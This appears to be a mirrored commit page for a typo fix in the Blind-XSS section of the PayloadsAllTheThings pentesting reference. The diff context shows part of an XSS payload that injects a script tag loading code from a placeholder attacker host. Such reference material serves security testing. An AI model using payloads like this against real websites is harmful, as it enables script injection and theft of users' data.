mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Merge pull request #378 from PinkDev1/patch-3
Fixed typo/wording on "Tips" section in Blind-XSS
This commit is contained in:
commit
18556c2caf
1 changed files with 1 additions and 1 deletions
|
@ -454,7 +454,7 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
|
||||||
|
|
||||||
### Tips
|
### Tips
|
||||||
|
|
||||||
You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
|
You can use a [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.
|
||||||
|
|
||||||
Eg. payload
|
Eg. payload
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue